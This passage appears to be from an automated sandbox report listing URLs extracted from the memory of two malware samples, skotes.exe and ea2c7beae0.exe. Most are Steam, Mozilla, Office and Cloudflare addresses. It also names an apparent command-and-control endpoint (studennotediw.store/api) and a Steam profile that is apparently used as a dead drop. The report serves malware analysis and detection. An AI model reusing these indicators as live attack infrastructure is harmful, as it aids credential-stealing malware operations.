Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.c3_
Source: skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/U
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/i
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611997243319001
Source: ea2c7beae0.exe, 00000007.00000003.2443518589.000000000103E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900t
Source: ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/sG
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: skotes.exe, 0000000D.00000003.2668339801.0000000001676000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.0000000001676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/765611997243319007
Source: ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900Ud
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: ea2c7beae0.exe, 00000007.00000003.2443701449.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd883ccb3237fa39
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: ea2c7beae0.exe, 00000007.00000002.2464806930.0000000001083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampoweredX
Source: ea2c7beae0.exe, 00000010.00000003.2740761284.00000000007C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store/api
Source: skotes.exe, 0000000D.00000003.2668339801.0000000001676000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.0000000001676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api
Source: ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api:d
Source: ea2c7beae0.exe, 0000000B.00000003.2603901519.000000000551E000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785260915.00000000053B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: ea2c7beae0.exe, 0000000B.00000003.2603997496.0000000005515000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2603901519.000000000551C000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785413689.00000000053AA000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785260915.00000000053B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: ea2c7beae0.exe, 0000000B.00000003.2603997496.00000000054F0000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785413689.0000000005385000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: ea2c7beae0.exe, 0000000B.00000003.2603997496.0000000005515000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2603901519.000000000551C000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785413689.00000000053AA000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785260915.00000000053B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: ea2c7beae0.exe, 0000000B.00000003.2603997496.00000000054F0000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785413689.0000000005385000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ea2c7beae0.exe, 00000010.00000003.2817250270.0000000005375000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: ea2c7beae0.exe, 00000007.00000003.2461981154.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587460635.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2894096560.0000000000829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: ea2c7beae0.exe, 00000007.00000003.2461981154.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/a
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785733963.000000000083D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2786592123.000000000083D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2799731430.000000000083D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/acc
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785733963.000000000083D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2786592123.000000000083D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2799731430.000000000083D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/accHH3
Source: ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/acces
Source: ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: ea2c7beae0.exe, 0000000B.00000003.2604502304.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2604288546.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785893107.0000000005384000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2786052209.000000000536D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ea2c7beae0.exe, 00000010.00000003.2817250270.0000000005375000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: ea2c7beae0.exe, 0000000B.00000003.2604502304.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2604288546.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785893107.0000000005384000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2786052209.000000000536D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
